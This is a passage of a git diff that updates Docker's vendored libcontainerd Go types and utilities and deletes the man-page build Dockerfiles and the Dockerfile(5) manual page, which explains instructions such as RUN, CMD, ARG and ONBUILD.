string) error + Status(ctx context.Context, containerID string) (Status, error) -// IOPipe contains the stdio streams. -type IOPipe struct { - Stdin io.WriteCloser - Stdout io.ReadCloser - Stderr io.ReadCloser - Terminal bool // Whether stderr is connected on Windows + UpdateResources(ctx context.Context, containerID string, resources *Resources) error + CreateCheckpoint(ctx context.Context, containerID, checkpointDir string, exit bool) error } -// ServerVersion contains version information as retrieved from the -// server -type ServerVersion struct { - containerd.GetServerVersionResponse -} +// StdioCallback is called to connect a container or process stdio. +type StdioCallback func(io *cio.DirectIO) (cio.IO, error) diff --git a/vendor/github.com/docker/docker/libcontainerd/types_linux.go b/vendor/github.com/docker/docker/libcontainerd/types_linux.go index cc2a17aec6..943382b9b0 100644 --- a/vendor/github.com/docker/docker/libcontainerd/types_linux.go +++ b/vendor/github.com/docker/docker/libcontainerd/types_linux.go @@ -1,49 +1,30 @@ -package libcontainerd +package libcontainerd // import "github.com/docker/docker/libcontainerd" import ( - containerd "github.com/docker/containerd/api/grpc/types" + "time" + + "github.com/containerd/cgroups" "github.com/opencontainers/runtime-spec/specs-go" ) -// Process contains information to start a specific application inside the container. -type Process struct { - // Terminal creates an interactive terminal for the container. - Terminal bool `json:"terminal"` - // User specifies user information for the process. - User *specs.User `json:"user"` - // Args specifies the binary and arguments for the application to execute. - Args []string `json:"args"` - // Env populates the process environment for the process. - Env []string `json:"env,omitempty"` - // Cwd is the current working directory for the process and must be - // relative to the container's root. - Cwd *string `json:"cwd"` - // Capabilities are linux capabilities that are kept for the container. - Capabilities []string `json:"capabilities,omitempty"` - // Rlimits specifies rlimit options to apply to the process. - Rlimits []specs.Rlimit `json:"rlimits,omitempty"` - // ApparmorProfile specifies the apparmor profile for the container. - ApparmorProfile *string `json:"apparmorProfile,omitempty"` - // SelinuxLabel specifies the selinux context that the container process is run as. - SelinuxLabel *string `json:"selinuxLabel,omitempty"` -} - -// StateInfo contains description about the new state container has entered. -type StateInfo struct { - CommonStateInfo +// Summary is not used on linux +type Summary struct{} - // Platform specific StateInfo - OOMKilled bool +// Stats holds metrics properties as returned by containerd +type Stats struct { + Read time.Time + Metrics *cgroups.Metrics } -// Stats contains a stats properties from containerd. -type Stats containerd.StatsResponse - -// Summary contains a container summary from containerd -type Summary struct{} +func interfaceToStats(read time.Time, v interface{}) *Stats { + return &Stats{ + Metrics: v.(*cgroups.Metrics), + Read: read, + } +} -// Resources defines updatable container resource values. -type Resources containerd.UpdateResource +// Resources defines updatable container resource values. TODO: it must match containerd upcoming API +type Resources specs.LinuxResources // Checkpoints contains the details of a checkpoint -type Checkpoints containerd.ListCheckpointResponse +type Checkpoints struct{} diff --git a/vendor/github.com/docker/docker/libcontainerd/types_solaris.go b/vendor/github.com/docker/docker/libcontainerd/types_solaris.go deleted file mode 100644 index dbafef669f..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/types_solaris.go +++ /dev/null @@ -1,43 +0,0 @@ -package libcontainerd - -import ( - containerd "github.com/docker/containerd/api/grpc/types" - "github.com/opencontainers/runtime-spec/specs-go" -) - -// Process contains information to start a specific application inside the container. -type Process struct { - // Terminal creates an interactive terminal for the container. - Terminal bool `json:"terminal"` - // User specifies user information for the process. - User *specs.User `json:"user"` - // Args specifies the binary and arguments for the application to execute. - Args []string `json:"args"` - // Env populates the process environment for the process. - Env []string `json:"env,omitempty"` - // Cwd is the current working directory for the process and must be - // relative to the container's root. - Cwd *string `json:"cwd"` - // Capabilities are linux capabilities that are kept for the container. - Capabilities []string `json:"capabilities,omitempty"` -} - -// Stats contains a stats properties from containerd. -type Stats struct{} - -// Summary contains a container summary from containerd -type Summary struct{} - -// StateInfo contains description about the new state container has entered. -type StateInfo struct { - CommonStateInfo - - // Platform specific StateInfo - OOMKilled bool -} - -// Resources defines updatable container resource values. -type Resources struct{} - -// Checkpoints contains the details of a checkpoint -type Checkpoints containerd.ListCheckpointResponse diff --git a/vendor/github.com/docker/docker/libcontainerd/types_windows.go b/vendor/github.com/docker/docker/libcontainerd/types_windows.go index 24a9a96440..9041a2e8d5 100644 --- a/vendor/github.com/docker/docker/libcontainerd/types_windows.go +++ b/vendor/github.com/docker/docker/libcontainerd/types_windows.go @@ -1,71 +1,34 @@ -package libcontainerd +package libcontainerd // import "github.com/docker/docker/libcontainerd" import ( + "time" + "github.com/Microsoft/hcsshim" - "github.com/opencontainers/runtime-spec/specs-go" + opengcs "github.com/Microsoft/opengcs/client" ) -// Process contains information to start a specific application inside the container. -type Process specs.Process - // Summary contains a ProcessList item from HCS to support `top` type Summary hcsshim.ProcessListItem -// StateInfo contains description about the new state container has entered. -type StateInfo struct { - CommonStateInfo - - // Platform specific StateInfo - - UpdatePending bool // Indicates that there are some update operations pending that should be completed by a servicing container. +// Stats contains statistics from HCS +type Stats struct { + Read time.Time + HCSStats *hcsshim.Statistics } -// Stats contains statics from HCS -type Stats hcsshim.Statistics +func interfaceToStats(read time.Time, v interface{}) *Stats { + return &Stats{ + HCSStats: v.(*hcsshim.Statistics), + Read: read, + } +} // Resources defines updatable container resource values. type Resources struct{} -// ServicingOption is a CreateOption with a no-op application that signifies -// the container needs to be used for a Windows servicing operation. -type ServicingOption struct { - IsServicing bool -} - -// FlushOption is a CreateOption that signifies if the container should be -// started with flushes ignored until boot has completed. This is an optimisation -// for first boot of a container. -type FlushOption struct { - IgnoreFlushesDuringBoot bool -} - -// HyperVIsolationOption is a CreateOption that indicates whether the runtime -// should start the container as a Hyper-V container, and if so, the sandbox path. -type HyperVIsolationOption struct { - IsHyperV bool - SandboxPath string `json:",omitempty"` -} - -// LayerOption is a CreateOption that indicates to the runtime the layer folder -// and layer paths for a container. -type LayerOption struct { - // LayerFolder is the path to the current layer folder. Empty for Hyper-V containers. - LayerFolderPath string `json:",omitempty"` - // Layer paths of the parent layers - LayerPaths []string -} - -// NetworkEndpointsOption is a CreateOption that provides the runtime list -// of network endpoints to which a container should be attached during its creation. -type NetworkEndpointsOption struct { - Endpoints []string - AllowUnqualifiedDNSQuery bool -} - -// CredentialsOption is a CreateOption that indicates the credentials from -// a credential spec to be used to the runtime -type CredentialsOption struct { - Credentials string +// LCOWOption is a CreateOption required for LCOW configuration +type LCOWOption struct { + Config *opengcs.Config } // Checkpoint holds the details of a checkpoint (not supported in windows) diff --git a/vendor/github.com/docker/docker/libcontainerd/utils_linux.go b/vendor/github.com/docker/docker/libcontainerd/utils_linux.go index 78828bcdad..ce17d1963d 100644 --- a/vendor/github.com/docker/docker/libcontainerd/utils_linux.go +++ b/vendor/github.com/docker/docker/libcontainerd/utils_linux.go @@ -1,62 +1,12 @@ -package libcontainerd +package libcontainerd // import "github.com/docker/docker/libcontainerd" -import ( - "syscall" +import "syscall" - containerd "github.com/docker/containerd/api/grpc/types" - "github.com/opencontainers/runtime-spec/specs-go" -) - -func getRootIDs(s specs.Spec) (int, int, error) { - var hasUserns bool - for _, ns := range s.Linux.Namespaces { - if ns.Type == specs.UserNamespace { - hasUserns = true - break - } - } - if !hasUserns { - return 0, 0, nil - } - uid := hostIDFromMap(0, s.Linux.UIDMappings) - gid := hostIDFromMap(0, s.Linux.GIDMappings) - return uid, gid, nil -} - -func hostIDFromMap(id uint32, mp []specs.IDMapping) int { - for _, m := range mp { - if id >= m.ContainerID && id <= m.ContainerID+m.Size-1 { - return int(m.HostID + id - m.ContainerID) - } - } - return 0 -} - -func systemPid(ctr *containerd.Container) uint32 { - var pid uint32 - for _, p := range ctr.Processes { - if p.Pid == InitFriendlyName { - pid = p.SystemPid - } - } - return pid -} - -func convertRlimits(sr []specs.Rlimit) (cr []*containerd.Rlimit) { - for _, r := range sr { - cr = append(cr, &containerd.Rlimit{ - Type: r.Type, - Hard: r.Hard, - Soft: r.Soft, - }) - } - return -} - -// setPDeathSig sets the parent death signal to SIGKILL -func setSysProcAttr(sid bool) *syscall.SysProcAttr { +// containerdSysProcAttr returns the SysProcAttr to use when exec'ing +// containerd +func containerdSysProcAttr() *syscall.SysProcAttr { return &syscall.SysProcAttr{ - Setsid: sid, + Setsid: true, Pdeathsig: syscall.SIGKILL, } } diff --git a/vendor/github.com/docker/docker/libcontainerd/utils_solaris.go b/vendor/github.com/docker/docker/libcontainerd/utils_solaris.go deleted file mode 100644 index 49632b45e5..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/utils_solaris.go +++ /dev/null @@ -1,27 +0,0 @@ -package libcontainerd - -import ( - "syscall" - - containerd "github.com/docker/containerd/api/grpc/types" - "github.com/opencontainers/runtime-spec/specs-go" -) - -func getRootIDs(s specs.Spec) (int, int, error) { - return 0, 0, nil -} - -func systemPid(ctr *containerd.Container) uint32 { - var pid uint32 - for _, p := range ctr.Processes { - if p.Pid == InitFriendlyName { - pid = p.SystemPid - } - } - return pid -} - -// setPDeathSig sets the parent death signal to SIGKILL -func setSysProcAttr(sid bool) *syscall.SysProcAttr { - return nil -} diff --git a/vendor/github.com/docker/docker/libcontainerd/utils_windows.go b/vendor/github.com/docker/docker/libcontainerd/utils_windows.go index 41ac40d2c2..fbf243d4f9 100644 --- a/vendor/github.com/docker/docker/libcontainerd/utils_windows.go +++ b/vendor/github.com/docker/docker/libcontainerd/utils_windows.go @@ -1,6 +1,12 @@ -package libcontainerd +package libcontainerd // import "github.com/docker/docker/libcontainerd" -import "strings" +import ( + "strings" + + "syscall" + + opengcs "github.com/Microsoft/opengcs/client" +) // setupEnvironmentVariables converts a string array of environment variables // into a map as required by the HCS. Source array is in format [v1=k1] [v2=k2] etc. @@ -15,32 +21,26 @@ func setupEnvironmentVariables(a []string) map[string]string { return r } -// Apply for a servicing option is a no-op. -func (s *ServicingOption) Apply(interface{}) error { - return nil -} - -// Apply for the flush option is a no-op. -func (f *FlushOption) Apply(interface{}) error { - return nil -} - -// Apply for the hypervisolation option is a no-op. -func (h *HyperVIsolationOption) Apply(interface{}) error { - return nil -} - -// Apply for the layer option is a no-op. -func (h *LayerOption) Apply(interface{}) error { +// Apply for the LCOW option is a no-op. +func (s *LCOWOption) Apply(interface{}) error { return nil } -// Apply for the network endpoints option is a no-op. -func (s *NetworkEndpointsOption) Apply(interface{}) error { - return nil +// debugGCS is a dirty hack for debugging for Linux Utility VMs. It simply +// runs a bunch of commands inside the UVM, but seriously aides in advanced debugging. +func (c *container) debugGCS() { + if c == nil || c.isWindows || c.hcsContainer == nil { + return + } + cfg := opengcs.Config{ + Uvm: c.hcsContainer, + UvmTimeoutSeconds: 600, + } + cfg.DebugGCS() } -// Apply for the credentials option is a no-op. -func (s *CredentialsOption) Apply(interface{}) error { +// containerdSysProcAttr returns the SysProcAttr to use when exec'ing +// containerd +func containerdSysProcAttr() *syscall.SysProcAttr { return nil } diff --git a/vendor/github.com/docker/docker/libcontainerd/utils_windows_test.go b/vendor/github.com/docker/docker/libcontainerd/utils_windows_test.go index f3679bfb71..2e0c260eca 100644 --- a/vendor/github.com/docker/docker/libcontainerd/utils_windows_test.go +++ b/vendor/github.com/docker/docker/libcontainerd/utils_windows_test.go @@ -1,4 +1,4 @@ -package libcontainerd +package libcontainerd // import "github.com/docker/docker/libcontainerd" import ( "testing" diff --git a/vendor/github.com/docker/docker/man/Dockerfile b/vendor/github.com/docker/docker/man/Dockerfile deleted file mode 100644 index 80e97ff01e..0000000000 --- a/vendor/github.com/docker/docker/man/Dockerfile +++ /dev/null @@ -1,24 +0,0 @@ -FROM golang:1.7.5-alpine - -RUN apk add -U git bash curl gcc musl-dev make - -RUN mkdir -p /go/src /go/bin /go/pkg -RUN export GLIDE=v0.11.1; \ - export TARGET=/go/src/github.com/Masterminds; \ - mkdir -p ${TARGET} && \ - git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \ - cd ${TARGET}/glide && \ - git checkout $GLIDE && \ - make build && \ - cp ./glide /usr/bin/glide && \ - cd / && rm -rf /go/src/* /go/bin/* /go/pkg/* - -COPY glide.yaml /manvendor/ -COPY glide.lock /manvendor/ -WORKDIR /manvendor/ -RUN glide install && mv vendor src -ENV GOPATH=$GOPATH:/manvendor -RUN go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man - -WORKDIR /go/src/github.com/docker/docker/ -ENTRYPOINT ["man/generate.sh"] diff --git a/vendor/github.com/docker/docker/man/Dockerfile.5.md b/vendor/github.com/docker/docker/man/Dockerfile.5.md deleted file mode 100644 index 5191b1930a..0000000000 --- a/vendor/github.com/docker/docker/man/Dockerfile.5.md +++ /dev/null @@ -1,474 +0,0 @@ -% DOCKERFILE(5) Docker User Manuals -% Zac Dover -% May 2014 -# NAME - -Dockerfile - automate the steps of creating a Docker image - -# INTRODUCTION - -The **Dockerfile** is a configuration file that automates the steps of creating -a Docker image. It is similar to a Makefile. Docker reads instructions from the -**Dockerfile** to automate the steps otherwise performed manually to create an -image. To build an image, create a file called **Dockerfile**. - -The **Dockerfile** describes the steps taken to assemble the image. When the -**Dockerfile** has been created, call the `docker build` command, using the -path of directory that contains **Dockerfile** as the argument. - -# SYNOPSIS - -INSTRUCTION arguments - -For example: - - FROM image - -# DESCRIPTION - -A Dockerfile is a file that automates the steps of creating a Docker image. -A Dockerfile is similar to a Makefile. - -# USAGE - - docker build . - - -- Runs the steps and commits them, building a final image. - The path to the source repository defines where to find the context of the - build. The build is run by the Docker daemon, not the CLI. The whole - context must be transferred to the daemon. The Docker CLI reports - `"Sending build context to Docker daemon"` when the context is sent to the - daemon. - - ``` - docker build -t repository/tag . - ``` - - -- specifies a repository and tag at which to save the new image if the build - succeeds. The Docker daemon runs the steps one-by-one, committing the result - to a new image if necessary, before finally outputting the ID of the new - image. The Docker daemon automatically cleans up the context it is given. - - Docker re-uses intermediate images whenever possible. This significantly - accelerates the *docker build* process. - -# FORMAT - - `FROM image` - - `FROM image:tag` - - `FROM image@digest` - - -- The **FROM** instruction sets the base image for subsequent instructions. A - valid Dockerfile must have **FROM** as its first instruction. The image can be any - valid image. It is easy to start by pulling an image from the public - repositories. - - -- **FROM** must be the first non-comment instruction in Dockerfile. - - -- **FROM** may appear multiple times within a single Dockerfile in order to create - multiple images. Make a note of the last image ID output by the commit before - each new **FROM** command. - - -- If no tag is given to the **FROM** instruction, Docker applies the - `latest` tag. If the used tag does not exist, an error is returned. - - -- If no digest is given to the **FROM** instruction, Docker applies the - `latest` tag. If the used tag does not exist, an error is returned. - -**MAINTAINER** - -- **MAINTAINER** sets the Author field for the generated images. - Useful for providing users with an email or url for support. - -**RUN** - -- **RUN** has two forms: - - ``` - # the command is run in a shell - /bin/sh -c - RUN - - # Executable form - RUN ["executable", "param1", "param2"] - ``` - - - -- The **RUN** instruction executes any commands in a new layer on top of the current - image and commits the results. The committed image is used for the next step in - Dockerfile. - - -- Layering **RUN** instructions and generating commits conforms to the core - concepts of Docker where commits are cheap and containers can be created from - any point in the history of an image. This is similar to source control. The - exec form makes it possible to avoid shell string munging. The exec form makes - it possible to **RUN** commands using a base image that does not contain `/bin/sh`. - - Note that the exec form is parsed as a JSON array, which means that you must - use double-quotes (") around words not single-quotes ('). - -**CMD** - -- **CMD** has three forms: - - ``` - # Executable form - CMD ["executable", "param1", "param2"]` - - # Provide default arguments to ENTRYPOINT - CMD ["param1", "param2"]` - - # the command is run in a shell - /bin/sh -c - CMD command param1 param2 - ``` - - -- There should be only one **CMD** in a Dockerfile. If more than one **CMD** is listed, only - the last **CMD** takes effect. - The main purpose of a **CMD** is to provide defaults for an executing container. - These defaults may include an executable, or they can omit the executable. If - they omit the executable, an **ENTRYPOINT** must be specified. - When used in the shell or exec formats, the **CMD** instruction sets the command to - be executed when running the image. - If you use the shell form of the **CMD**, the `` executes in `/bin/sh -c`: - - Note that the exec form is parsed as a JSON array, which means that you must - use double-quotes (") around words not single-quotes ('). - - ``` - FROM ubuntu - CMD echo "This is a test." | wc - - ``` - - -- If you run **command** without a shell, then you must express the command as a - JSON array and give the full path to the executable. This array form is the - preferred form of **CMD**. All additional parameters must be individually expressed - as strings in the array: - - ``` - FROM ubuntu - CMD ["/usr/bin/wc","--help"] - ``` - - -- To make the container run the same executable every time, use **ENTRYPOINT** in - combination with **CMD**. - If the user specifies arguments to `docker run`, the specified commands - override the default in **CMD**. - Do not confuse **RUN** with **CMD**. **RUN** runs a command and commits the result. - **CMD** executes nothing at build time, but specifies the intended command for - the image. - -**LABEL** - -- `LABEL = [= ...]`or - ``` - LABEL [ ] - LABEL [ ] - ... - ``` - The **LABEL** instruction adds metadata to an image. A **LABEL** is a - key-value pair. To specify a **LABEL** without a value, simply use an empty - string. To include spaces within a **LABEL** value, use quotes and - backslashes as you would in command-line parsing. - - ``` - LABEL com.example.vendor="ACME Incorporated" - LABEL com.example.vendor "ACME Incorporated" - LABEL com.example.vendor.is-beta "" - LABEL com.example.vendor.is-beta= - LABEL com.example.vendor.is-beta="" - ``` - - An image can have more than one label. To specify multiple labels, separate - each key-value pair by a space. - - Labels are additive including `LABEL`s in `FROM` images. As the system - encounters and then applies a new label, new `key`s override any previous - labels with identical keys. - - To display an image's labels, use the `docker inspect` command. - -**EXPOSE** - -- `EXPOSE [...]` - The **EXPOSE** instruction informs Docker that the container listens on the - specified network ports at runtime. Docker uses this information to - interconnect containers using links and to set up port redirection on the host - system. - -**ENV** - -- `ENV ` - The **ENV** instruction sets the environment variable to - the value ``. This value is passed to all future - **RUN**, **ENTRYPOINT**, and **CMD** instructions. This is - functionally equivalent to prefixing the command with `=`. The - environment variables that are set with **ENV** persist when a container is run - from the resulting image. Use `docker inspect` to inspect these values, and - change them using `docker run --env =`. - - Note that setting "`ENV DEBIAN_FRONTEND noninteractive`" may cause - unintended consequences, because it will persist when the container is run - interactively, as with the following command: `docker run -t -i image bash` - -**ADD** - -- **ADD** has two forms: - - ``` - ADD - - # Required for paths with whitespace - ADD ["",... ""] - ``` - - The **ADD** instruction copies new files, directories - or remote file URLs to the filesystem of the container at path ``. - Multiple `` resources may be specified but if they are files or directories - then they must be relative to the source directory that is being built - (the context of the build). The `` is the absolute path, or path relative - to **WORKDIR**, into which the source is copied inside the target container. - If the `` argument is a local file in a recognized compression format - (tar, gzip, bzip2, etc) then it is unpacked at the specified `` in the - container's filesystem. Note that only local compressed files will be unpacked, - i.e., the URL download and archive unpacking features cannot be used together. - All new directories are created with mode 0755 and with the uid and gid of **0**. - -**COPY** - -- **COPY** has two forms: - - ``` - COPY - - # Required for paths with whitespace - COPY ["",... ""] - ``` - - The **COPY** instruction copies new files from `` and - adds them to the filesystem of the container at path . The `` must be - the path to a file or directory relative to the source directory that is - being built (the context of the build) or a remote file URL. The `` is an - absolute path, or a path relative to **WORKDIR**, into which the source will - be copied inside the target container. If you **COPY** an archive file it will - land in the container exactly as it appears in the build context without any - attempt to unpack it. All new files and directories are created with mode **0755** - and with the uid and gid of **0**. - -**ENTRYPOINT** - -- **ENTRYPOINT** has two forms: - - ``` - # executable form - ENTRYPOINT ["executable", "param1", "param2"]` - - # run command in a shell - /bin/sh -c - ENTRYPOINT command param1 param2 - ``` - - -- An **ENTRYPOINT** helps you configure a - container that can be run as an executable. When you specify an **ENTRYPOINT**, - the whole container runs as if it was only that executable. The **ENTRYPOINT** - instruction adds an entry command that is not overwritten when arguments are - passed to docker run. This is different from the behavior of **CMD**. This allows - arguments to be passed to the entrypoint, for instance `docker run -d` - passes the -d argument to the **ENTRYPOINT**. Specify parameters either in the - **ENTRYPOINT** JSON array (as in the preferred exec form above), or by using a **CMD** - statement. Parameters in the **ENTRYPOINT** are not overwritten by the docker run - arguments. Parameters specified via **CMD** are overwritten by docker run - arguments. Specify a plain string for the **ENTRYPOINT**, and it will execute in - `/bin/sh -c`, like a **CMD** instruction: - - ``` - FROM ubuntu - ENTRYPOINT wc -l - - ``` - - This means that the Dockerfile's image always takes stdin as input (that's - what "-" means), and prints the number of lines (that's what "-l" means). To - make this optional but default, use a **CMD**: - - ``` - FROM ubuntu - CMD ["-l", "-"] - ENTRYPOINT ["/usr/bin/wc"] - ``` - -**VOLUME** - -- `VOLUME ["/data"]` - The **VOLUME** instruction creates a mount point with the specified name and marks - it as holding externally-mounted volumes from the native host or from other - containers. - -**USER** - -- `USER daemon` - Sets the username or UID used for running subsequent commands. - - The **USER** instruction can optionally be used to set the group or GID. The - followings examples are all valid: - USER [user | user:group | uid | uid:gid | user:gid | uid:group ] - - Until the **USER** instruction is set, instructions will be run as root. The USER - instruction can be used any number of times in a Dockerfile, and will only affect - subsequent commands. - -**WORKDIR** - -- `WORKDIR /path/to/workdir` - The **WORKDIR** instruction sets the working directory for the **RUN**, **CMD**, - **ENTRYPOINT**, **COPY** and **ADD** Dockerfile commands that follow it. It can - be used multiple times in a single Dockerfile. Relative paths are defined - relative to the path of the previous **WORKDIR** instruction. For example: - - ``` - WORKDIR /a - WORKDIR b - WORKDIR c - RUN pwd - ``` - - In the above example, the output of the **pwd** command is **a/b/c**. - -**ARG** - -- ARG [=] - - The `ARG` instruction defines a variable that users can pass at build-time to - the builder with the `docker build` command using the `--build-arg - =` flag. If a user specifies a build argument that was not - defined in the Dockerfile, the build outputs a warning. - - ``` - [Warning] One or more build-args [foo] were not consumed - ``` - - The Dockerfile author can define a single variable by specifying `ARG` once or many - variables by specifying `ARG` more than once. For example, a valid Dockerfile: - - ``` - FROM busybox - ARG user1 - ARG buildno - ... - ``` - - A Dockerfile author may optionally specify a default value for an `ARG` instruction: - - ``` - FROM busybox - ARG user1=someuser - ARG buildno=1 - ... - ``` - - If an `ARG` value has a default and if there is no value passed at build-time, the - builder uses the default. - - An `ARG` variable definition comes into effect from the line on which it is - defined in the `Dockerfile` not from the argument's use on the command-line or - elsewhere. For example, consider this Dockerfile: - - ``` - 1 FROM busybox - 2 USER ${user:-some_user} - 3 ARG user - 4 USER $user - ... - ``` - A user builds this file by calling: - - ``` - $ docker build --build-arg user=what_user Dockerfile - ``` - - The `USER` at line 2 evaluates to `some_user` as the `user` variable is defined on the - subsequent line 3. The `USER` at line 4 evaluates to `what_user` as `user` is - defined and the `what_user` value was passed on the command line. Prior to its definition by an - `ARG` instruction, any use of a variable results in an empty string. - - > **Warning:** It is not recommended to use build-time variables for - > passing secrets like github keys, user credentials etc. Build-time variable - > values are visible to any user of the image with the `docker history` command. - - You can use an `ARG` or an `ENV` instruction to specify variables that are - available to the `RUN` instruction. Environment variables defined using the - `ENV` instruction always override an `ARG` instruction of the same name. Consider - this Dockerfile with an `ENV` and `ARG` instruction. - - ``` - 1 FROM ubuntu - 2 ARG CONT_IMG_VER - 3 ENV CONT_IMG_VER v1.0.0 - 4 RUN echo $CONT_IMG_VER - ``` - Then, assume this image is built with this command: - - ``` - $ docker build --build-arg CONT_IMG_VER=v2.0.1 Dockerfile - ``` - - In this case, the `RUN` instruction uses `v1.0.0` instead of the `ARG` setting - passed by the user:`v2.0.1` This behavior is similar to a shell - script where a locally scoped variable overrides the variables passed as - arguments or inherited from environment, from its point of definition. - - Using the example above but a different `ENV` specification you can create more - useful interactions between `ARG` and `ENV` instructions: - - ``` - 1 FROM ubuntu - 2 ARG CONT_IMG_VER - 3 ENV CONT_IMG_VER ${CONT_IMG_VER:-v1.0.0} - 4 RUN echo $CONT_IMG_VER - ``` - - Unlike an `ARG` instruction, `ENV` values are always persisted in the built - image. Consider a docker build without the --build-arg flag: - - ``` - $ docker build Dockerfile - ``` - - Using this Dockerfile example, `CONT_IMG_VER` is still persisted in the image but - its value would be `v1.0.0` as it is the default set in line 3 by the `ENV` instruction. - - The variable expansion technique in this example allows you to pass arguments - from the command line and persist them in the final image by leveraging the - `ENV` instruction. Variable expansion is only supported for [a limited set of - Dockerfile instructions.](#environment-replacement) - - Docker has a set of predefined `ARG` variables that you can use without a - corresponding `ARG` instruction in the Dockerfile. - - * `HTTP_PROXY` - * `http_proxy` - * `HTTPS_PROXY` - * `https_proxy` - * `FTP_PROXY` - * `ftp_proxy` - * `NO_PROXY` - * `no_proxy` - - To use these, simply pass them on the command line using the `--build-arg - =` flag. - -**ONBUILD** - -- `ONBUILD [INSTRUCTION]` - The **ONBUILD** instruction adds a trigger instruction to an image. The - trigger is executed at a later time, when the image is used as the base for - another build. Docker executes the trigger in the context of the downstream - build, as if the trigger existed immediately after the **FROM** instruction in - the downstream Dockerfile. - - You can register any build instruction as a trigger. A trigger is useful if - you are defining an image to use as a base for building other images. For - example, if you are defining an application build environment or a daemon that - is customized with a user-specific configuration. - - Consider an image intended as a reusable python application builder. It must - add application source code to a particular directory, and might need a build - script called after that. You can't just call **ADD** and **RUN** now, because - you don't yet have access to the application source code, and it is different - for each application build. - - -- Providing application developers with a boilerplate Dockerfile to copy-paste - into their application is inefficient, error-prone, and - difficult to update because it mixes with application-specific code. - The solution is to use **ONBUILD** to register instructions in advance, to - run later, during the next build stage. - -# HISTORY -*May 2014, Compiled by Zac Dover (zdover at redhat dot com) based on docker.com Dockerfile documentation. -*Feb 2015, updated by Brian Goff (cpuguy83@gmail.com) for readability -*Sept 2015, updated by Sally O'Malley (somalley@redhat.com) -*Oct 2016, updated by Addam Hardy (addam.hardy@gmail.com) diff --git a/vendor/github.com/docker/docker/man/Dockerfile.aarch64 b/vendor/github.com/docker/docker/man/Dockerfile.aarch64 deleted file mode 100644 index e788eb1c1d..0000000000 --- a/vendor/github.com/docker/docker/man/Dockerfile.aarch64 +++ /dev/null @@ -1,25 +0,0 @@ -FROM aarch64/ubuntu:xenial - -RUN apt-get update && apt-get install -y git golang-go - -RUN mkdir -p /go/src /go/bin /go/pkg -ENV GOPATH=/go -RUN export GLIDE=v0.11.1; \ - export TARGET=/go/src/github.com/Masterminds; \ - mkdir -p ${TARGET} && \ - git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \ - cd ${TARGET}/glide && \ - git checkout $GLIDE && \ - make build && \ - cp ./glide /usr/bin/glide && \ - cd / && rm -rf /go/src/* /go/bin/* /go/pkg/* - -COPY glide.yaml /manvendor/ -COPY glide.lock /manvendor/ -WORKDIR /manvendor/ -RUN glide install && mv vendor src -ENV GOPATH=$GOPATH:/manvendor -RUN go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man - -WORKDIR /go/src/github.com/docker/docker/ -ENTRYPOINT ["man/generate.sh"] diff --git a/vendor/github.com/docker/docker/man/Dockerfile.armhf b/vendor/github.com/docker/docker/man/Dockerfile.armhf deleted file mode 100644 index e7ea495646..0000000000 --- a/vendor/github.com/docker/docker/man/Dockerfile.armhf +++ /dev/null @@ -1,43 +0,0 @@ -FROM armhf/debian:jessie - -# allow replacing httpredir or deb mirror -ARG APT_MIRROR=deb.debian.org -RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list - -RUN apt-get update && apt-get install -y \ - git \ - bash \ - curl \ - gcc \ - make - -ENV GO_VERSION 1.7.5 -RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" \ - | tar -xzC /usr/local -ENV PATH /go/bin:/usr/local/go/bin:$PATH -ENV GOPATH /go - -# We're building for armhf, which is ARMv7, so let's be explicit about that -ENV GOARCH arm -ENV GOARM 7 - -RUN mkdir -p /go/src /go/bin /go/pkg -RUN export GLIDE=v0.11.1; \ - export TARGET=/go/src/github.com/Masterminds; \ - mkdir -p ${TARGET} && \ - git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \ - cd ${TARGET}/glide && \ - git checkout $GLIDE && \ - make build && \ - cp ./glide /usr/bin/glide && \ - cd / && rm -rf /go/src/* /go/bin/* /go/pkg/* - -COPY glide.yaml /manvendor/ -COPY glide.lock /manvendor/ -WORKDIR /manvendor/ -RUN glide install && mv vendor src -ENV GOPATH=$GOPATH:/manvendor -RUN go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man - -WORKDIR /go/src/github.com/docker/docker/ -ENTRYPOINT ["man/generate.sh"] diff --git a/vendor/github.com/docker/docker/man/Dockerfile.ppc64le b/vendor/github.com/docker/docker/man/Dockerfile.ppc64le deleted file mode 100644 index fc96ca7691..0000000000 --- a/vendor/github.com/docker/docker/man/Dockerfile.ppc64le +++ /dev/null @@ -1,35 +0,0 @@ -FROM ppc64le/ubuntu:xenial - -RUN apt-get update && apt-get install -y \ - curl \ - gcc \ - git \ - make \ - tar - -ENV GO_VERSION 1.7.5 -RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" \ - | tar -xzC /usr/local -ENV PATH /usr/local/go/bin:$PATH -ENV GOPATH=/go - -RUN mkdir -p /go/src /go/bin /go/pkg -RUN export GLIDE=v0.11.1; \ - export TARGET=/go/src/github.com/Masterminds; \ - mkdir -p ${TARGET} && \ - git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \ - cd ${TARGET}/glide && \ - git checkout $GLIDE && \ - make build && \ - cp ./glide /usr/bin/glide && \ - cd / && rm -rf /go/src/* /go/bin/* /go/pkg/* - -COPY glide.yaml /manvendor/ -COPY glide.lock /manvendor/ -WORKDIR /manvendor/ -RUN glide install && mv vendor src -ENV GOPATH=$GOPATH:/manvendor -RUN go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man - -WORKDIR /go/src/github.com/docker/docker/ -ENTRYPOINT ["man/generate.sh"] diff --git a/vendor/github.com/docker/docker/man/Dockerfile.s390x b/vendor/github.com/docker/docker/man/Dockerfile.s390x deleted file mode 100644 index d4bcf1da11..0000000000 --- a/vendor/github.com/docker/docker/man/Dockerfile.s390x +++ /dev/null @@ -1,35 +0,0 @@ -FROM s390x/ubuntu:xenial - -RUN apt-get update && apt-get install -y \ - curl \ - gcc \ - git \ - make \ - tar - -ENV GO_VERSION 1.7.5 -RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-s390x.tar.gz" \ - | tar -xzC /usr/local -ENV PATH /usr/local/go/bin:$PATH -ENV GOPATH=/go - -RUN mkdir -p /go/src /go/bin /go/pkg 